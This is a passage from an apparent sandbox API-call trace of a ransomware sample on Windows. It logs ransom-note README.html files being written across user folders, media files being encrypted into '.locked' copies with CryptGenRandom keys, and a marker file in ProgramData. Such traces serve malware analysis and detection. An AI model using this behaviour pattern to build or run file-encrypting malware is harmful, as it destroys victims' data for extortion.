nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12665600*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.713] CloseHandle (hObject=0x17c) returned 1 [0257.714] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.717] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.717] WriteFile (in: hFile=0x17c, lpBuffer=0x12666380*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12666380*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.718] CloseHandle (hObject=0x17c) returned 1 [0257.719] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.722] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.722] WriteFile (in: hFile=0x17c, lpBuffer=0x12667100*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12667100*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.723] CloseHandle (hObject=0x17c) returned 1 [0257.723] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\OneDrive\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.724] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.724] WriteFile (in: hFile=0x17c, lpBuffer=0x125f0000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f0000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.737] CloseHandle (hObject=0x17c) returned 1 [0257.738] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.739] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.739] WriteFile (in: hFile=0x17c, lpBuffer=0x125f0d80*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f0d80*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.740] CloseHandle (hObject=0x17c) returned 1 [0257.741] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.741] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.741] WriteFile (in: hFile=0x17c, lpBuffer=0x125f1b00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f1b00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.742] CloseHandle (hObject=0x17c) returned 1 [0257.743] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.743] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.743] WriteFile (in: hFile=0x17c, lpBuffer=0x125f2880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f2880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.745] CloseHandle (hObject=0x17c) returned 1 [0257.745] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.746] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.746] WriteFile (in: hFile=0x17c, lpBuffer=0x125f3600*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f3600*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.747] CloseHandle (hObject=0x17c) returned 1 [0257.748] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.748] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.749] WriteFile (in: hFile=0x17c, lpBuffer=0x125f4380*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f4380*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.750] CloseHandle (hObject=0x17c) returned 1 [0257.750] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.751] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.751] WriteFile (in: hFile=0x17c, lpBuffer=0x125f5100*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f5100*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.752] CloseHandle (hObject=0x17c) returned 1 [0257.752] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.755] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.755] WriteFile (in: hFile=0x17c, lpBuffer=0x125f6000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f6000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.757] CloseHandle (hObject=0x17c) returned 1 [0257.757] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.758] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.758] WriteFile (in: hFile=0x17c, lpBuffer=0x125f6d80*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f6d80*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.759] CloseHandle (hObject=0x17c) returned 1 [0257.760] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.760] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.760] WriteFile (in: hFile=0x17c, lpBuffer=0x125f7b00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f7b00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.762] CloseHandle (hObject=0x17c) returned 1 [0257.763] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\Y7n QDyh jI\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\y7n qdyh ji\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.764] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.764] WriteFile (in: hFile=0x17c, lpBuffer=0x125f8880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f8880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.767] CloseHandle (hObject=0x17c) returned 1 [0257.767] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.768] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.768] WriteFile (in: hFile=0x17c, lpBuffer=0x125f9600*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125f9600*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.770] CloseHandle (hObject=0x17c) returned 1 [0257.770] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.771] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.771] WriteFile (in: hFile=0x17c, lpBuffer=0x125fa380*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125fa380*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.772] CloseHandle (hObject=0x17c) returned 1 [0257.772] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.773] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.773] WriteFile (in: hFile=0x17c, lpBuffer=0x125fb100*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x125fb100*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.774] CloseHandle (hObject=0x17c) returned 1 [0257.776] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Saved Games\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.776] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.776] WriteFile (in: hFile=0x17c, lpBuffer=0x12496000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12496000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.779] CloseHandle (hObject=0x17c) returned 1 [0257.779] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Searches\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.790] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.790] WriteFile (in: hFile=0x17c, lpBuffer=0x12496d80*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12496d80*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.792] CloseHandle (hObject=0x17c) returned 1 [0257.794] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.794] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.794] WriteFile (in: hFile=0x17c, lpBuffer=0x12497b00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12497b00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.796] CloseHandle (hObject=0x17c) returned 1 [0257.796] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.796] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.796] WriteFile (in: hFile=0x17c, lpBuffer=0x12498880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12498880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.798] CloseHandle (hObject=0x17c) returned 1 [0257.809] SetEvent (hEvent=0x12c) returned 1 [0257.811] GetProcAddress (hModule=0x75600000, lpProcName="WriteConsoleW") returned 0x75627020 [0257.812] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12639a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12639a24*=0xb) returned 1 [0257.855] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ZH5t5F Pn3U-oGq.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zh5t5f pn3u-ogq.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.856] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12639d9c | out: lpMode=0x12639d9c) returned 0 [0257.856] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ZH5t5F Pn3U-oGq.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zh5t5f pn3u-ogq.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0257.860] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12639d9c | out: lpMode=0x12639d9c) returned 0 [0257.861] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0257.861] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x127663d0 | out: pbBuffer=0x127663d0) returned 1 [0257.862] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340581 | out: pbBuffer=0x12340581) returned 1 [0257.862] WriteFile (in: hFile=0x180, lpBuffer=0x126eb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12639d78, lpOverlapped=0x0 | out: lpBuffer=0x126eb000*, lpNumberOfBytesWritten=0x12639d78*=0x80, lpOverlapped=0x0) returned 1 [0257.864] VirtualAlloc (lpAddress=0x12840000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x12840000 [0257.919] VirtualAlloc (lpAddress=0x1101e000, dwSize=0x9e000, flAllocationType=0x1000, flProtect=0x4) returned 0x1101e000 [0257.923] VirtualAlloc (lpAddress=0x2166000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2166000 [0258.213] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0258.323] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0258.383] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0258.858] SetEvent (hEvent=0x14c) returned 1 [0258.858] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0258.872] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390240*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x124b7a24, lpReserved=0x0 | out: lpBuffer=0x12390240*, lpNumberOfCharsWritten=0x124b7a24*=0xa) returned 1 [0258.887] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0259.042] CreateFileW (lpFileName="C:\\\\Users\\Default\\Documents\\My Music" (normalized: "c:\\users\\default\\documents\\my music"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.043] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x124b7ac8 | out: lpFindFileData=0x124b7ac8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0259.043] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0259.044] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x124b7e94 | out: lpMode=0x124b7e94) returned 0 [0259.313] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0259.429] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0259.536] SetEvent (hEvent=0x14c) returned 1 [0259.536] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0259.571] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0259.832] SetEvent (hEvent=0x190) returned 1 [0259.832] SwitchToThread () returned 1 [0259.839] SetEvent (hEvent=0x190) returned 1 [0259.839] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0259.889] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0260.065] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0260.155] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0260.199] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0260.332] SetEvent (hEvent=0x14c) returned 1 [0260.332] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\1TSkQagxs.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\1tskqagxs.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0260.656] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0260.695] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1276bd9c | out: lpMode=0x1276bd9c) returned 0 [0260.695] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0260.695] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766070 | out: pbBuffer=0x12766070) returned 1 [0260.696] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702181 | out: pbBuffer=0x12702181) returned 1 [0260.696] WriteFile (in: hFile=0x1bc, lpBuffer=0x12749000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12639d78, lpOverlapped=0x0 | out: lpBuffer=0x12749000*, lpNumberOfBytesWritten=0x12639d78*=0x80, lpOverlapped=0x0) returned 1 [0260.699] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa4, ulCount=0x10, ulNumEntriesRemoved=0x19fa84, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa4, ulNumEntriesRemoved=0x19fa84) returned 0 [0260.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12760d80, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d4 [0260.700] CloseHandle (hObject=0x1d4) returned 1 [0260.700] SetEvent (hEvent=0x1d0) returned 1 [0260.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12760fc0, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d4 [0260.701] CloseHandle (hObject=0x1d4) returned 1 [0260.701] ReadFile (in: hFile=0x180, lpBuffer=0x12c1a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12639d68, lpOverlapped=0x0 | out: lpBuffer=0x12c1a000*, lpNumberOfBytesRead=0x12639d68*=0x1c32, lpOverlapped=0x0) returned 1 [0260.702] WriteFile (in: hFile=0x1bc, lpBuffer=0x12c1a000*, nNumberOfBytesToWrite=0x1c32, lpNumberOfBytesWritten=0x12639d74, lpOverlapped=0x0 | out: lpBuffer=0x12c1a000*, lpNumberOfBytesWritten=0x12639d74*=0x1c32, lpOverlapped=0x0) returned 1 [0260.835] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0260.853] ReadFile (in: hFile=0x180, lpBuffer=0x12c1a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12639d68, lpOverlapped=0x0 | out: lpBuffer=0x12c1a000*, lpNumberOfBytesRead=0x12639d68*=0x0, lpOverlapped=0x0) returned 1 [0260.853] CloseHandle (hObject=0x1bc) returned 1 [0261.046] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0261.251] CloseHandle (hObject=0x180) returned 1 [0261.251] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0261.343] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0261.343] SetEvent (hEvent=0x1ac) returned 1 [0261.343] SetEvent (hEvent=0x21c) returned 1 [0261.343] SetEvent (hEvent=0x1dc) returned 1 [0261.343] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0261.360] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0261.360] SetEvent (hEvent=0x150) returned 1 [0261.361] SetEvent (hEvent=0x1dc) returned 1 [0261.361] SetEvent (hEvent=0x21c) returned 1 [0261.361] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" 